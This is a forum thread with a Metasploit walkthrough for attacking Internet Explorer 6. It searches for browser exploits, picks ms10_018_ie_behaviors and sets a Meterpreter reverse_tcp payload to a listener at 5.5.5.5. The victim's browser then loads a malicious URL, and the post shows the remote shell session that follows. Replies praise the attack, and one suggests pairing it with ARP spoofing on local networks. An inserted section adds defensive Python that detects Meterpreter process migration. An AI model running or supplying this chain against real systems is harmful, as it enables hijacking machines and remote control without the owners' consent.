7. Carrying out a browser attack with MSF
Posted on 2012-8-4 17:28:26
Start MSF and search for exploits:
Mine is XP2 1 and the browser is IE6, so:
msf > search ie6

Matching Modules
================

   Name                                                       Disclosure Date  Rank     Description
   ----                                                       ---------------  ----     -----------
   exploit/windows/browser/adobe_flashplayer_avm              2011-03-15       good     Adobe Flash Player AVM Bytecode Verification Vulnerability
   exploit/windows/browser/hp_loadrunner_addfile              2008-01-25       normal   Persits XUpload ActiveX AddFile Buffer Overflow
   exploit/windows/browser/hp_loadrunner_addfolder            2007-12-25       good     HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
   exploit/windows/browser/intrust_annotatex_add              2012-03-28       average  Quest InTrust Annotation Objects Uninitialized Pointer
   exploit/windows/browser/ms06_013_createtextrange           2006-03-19       normal   Internet Explorer createTextRange() Code Execution
   exploit/windows/browser/ms06_071_xml_core                  2006-10-10       normal   Internet Explorer XML Core Services HTTP Request Handling
   exploit/windows/browser/ms07_017_ani_loadimage_chunksize   2007-03-28       great    Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   exploit/windows/browser/ms09_043_owc_htmlurl               2009-08-11       normal   Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
   exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
   exploit/windows/browser/nctaudiofile2_setformatlikesample  2007-01-24       normal   NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
   exploit/windows/browser/realplayer_qcp                     2011-08-16       average  RealNetworks Realplayer QCP Parsing Heap Overflow
   exploit/windows/browser/teechart_pro                       2011-08-11       normal   TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
   exploit/windows/browser/viscom_movieplayer_drawtext        2010-01-12       normal   Viscom Software Movie Player Pro SDK ActiveX 6.8
   exploit/windows/browser/vlc_mms_bof                        2012-03-15       normal   VLC MMS Stream Handling Buffer Overflow
   exploit/windows/fileformat/msworks_wkspictureinterface     2008-11-28       low      Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution

msf >
Then look at the Rank; GOOD means a high success rate.
   exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
This one is GOOD, so use this one:
Enter the exploit module
msf > use exploit/windows/browser/ms10_018_ie_behaviors
msf  exploit(ms10_018_ie_behaviors) >
View the options
msf  exploit(ms10_018_ie_behaviors) > show options

Module options (exploit/windows/browser/ms10_018_ie_behaviors):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

msf  exploit(ms10_018_ie_behaviors) >
Set the URIPATH
msf  exploit(ms10_018_ie_behaviors) > set URIPATH /1.fuck
URIPATH => /1.fuck
Set the backdoor
msf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms10_018_ie_behaviors) >
Configure the backdoor
msf  exploit(ms10_018_ie_behaviors) > set LHOST 5.5.5.5  // listening IP
LHOST => 5.5.5.5
msf  exploit(ms10_018_ie_behaviors) > set LPORT 5423   // listening port
LPORT => 5423
msf  exploit(ms10_018_ie_behaviors) >
Run
msf  exploit(ms10_018_ie_behaviors) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 5.5.5.5:5423
[*] Using URL: http://0.0.0.0:8080/1.fuck
[*]  Local IP: http://5.5.5.5:8080/1.fuck
[*] Server started.
msf  exploit(ms10_018_ie_behaviors) >
Then the target browses to http://5.5.5.5:8080/1.fuck
It gets infected and we obtain the backdoor:
msf  exploit(ms10_018_ie_behaviors) > [*] 5.5.5.3          ms10_018_ie_behaviors - Sending Internet Explorer DHTML Behaviors Use After Free (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.5:5423 -> 5.5.5.3:1049) at 2012-05-12 00:29:05 +0800
[*] Session ID 1 (5.5.5.5:5423 -> 5.5.5.3:1049) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: Explorer.EXE (1536)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1688
[+] Successfully migrated to process
View the sessions
msf  exploit(ms10_018_ie_behaviors) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  DIS9TEAM-ECFCC8\brk @ DIS9TEAM-ECFCC8  5.5.5.5:5423 -> 5.5.5.3:1049 (5.5.5.3)

Connect to the session
msf  exploit(ms10_018_ie_behaviors) > sessions -i 1
Starting interaction with 1...

meterpreter > shell


Play a thousand tunes and you come to know music; examine a thousand swords and you come to know weapons.
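From the defender's side, the session log above shows the tell-tale post-exploitation chain: the process hosting the browser content (Explorer.EXE, pid 1536) holds the reverse TCP connection to 5.5.5.5:5423, spawns notepad.exe (pid 1688), and the session migrates into it. The following is an added detection heuristic over constructed, netstat-style telemetry records (the field names and the `NO_NETWORK_IMAGES` list are assumptions); it is not code from the post or from Metasploit.

```python
"""Flag processes that should never talk to the network but own an outbound
TCP connection, and the stronger case where the parent process already had
the same remote endpoint (the Meterpreter 'migrate' pattern from the post).
All records below are constructed sample telemetry, not real logs."""
from collections import defaultdict

# Constructed sample events. "proc" = process creation, "net" = a process
# observed owning an outbound TCP connection (as a netstat -o snapshot shows).
SAMPLE_EVENTS = [
    {"type": "net", "pid": 1536, "image": "Explorer.EXE", "dst": "5.5.5.5", "dport": 5423},
    {"type": "proc", "pid": 1688, "image": "notepad.exe", "ppid": 1536, "pimage": "Explorer.EXE"},
    {"type": "net", "pid": 1688, "image": "notepad.exe", "dst": "5.5.5.5", "dport": 5423},
    # Benign noise: a user-launched notepad with no socket, and normal web traffic.
    {"type": "proc", "pid": 2000, "image": "notepad.exe", "ppid": 900, "pimage": "explorer.exe"},
    {"type": "net", "pid": 3000, "image": "iexplore.exe", "dst": "93.184.216.34", "dport": 80},
]

# Images that have no legitimate reason to own an outbound connection (assumed list).
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe"}


def find_migration_pattern(events):
    """Return a list of alerts as tuples:
    (kind, pid, image, parent_pid, parent_image, (dst, dport)).
    kind is "migration" when the parent held the same endpoint, otherwise
    "unexpected_network"."""
    parents = {}                  # pid -> (ppid, parent image)
    endpoints = defaultdict(set)  # pid -> {(dst, dport), ...}
    for ev in events:
        if ev["type"] == "proc":
            parents[ev["pid"]] = (ev["ppid"], ev["pimage"])
        elif ev["type"] == "net":
            endpoints[ev["pid"]].add((ev["dst"], ev["dport"]))

    alerts = []
    for ev in events:
        if ev["type"] != "net" or ev["image"].lower() not in NO_NETWORK_IMAGES:
            continue
        endpoint = (ev["dst"], ev["dport"])
        ppid, pimage = parents.get(ev["pid"], (None, None))
        if ppid is not None and endpoint in endpoints.get(ppid, set()):
            alerts.append(("migration", ev["pid"], ev["image"], ppid, pimage, endpoint))
        else:
            alerts.append(("unexpected_network", ev["pid"], ev["image"], None, None, endpoint))
    return alerts


if __name__ == "__main__":
    for alert in find_migration_pattern(SAMPLE_EVENTS):
        print(alert)
```

Only the migrated notepad.exe is reported; the idle notepad.exe and the browser's port-80 traffic produce no alert.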
Posted on 2014-8-16 20:38:14
Awesome...
Posted on 2014-11-19 10:52:58
ARP + MSF, the LAN trump card
Posted on 2015-3-14 09:42:13
A very badass attack
Posted on 2015-9-29 16:52:07
A very badass attack
Posted on 2015-11-12 19:21:19
Learned something! Thanks to the OP for sharing
Posted on 2016-1-25 17:01:34
Learned something! Thanks to the OP for sharing
Posted on 2017-11-16 16:28:18
Good study material, thanks
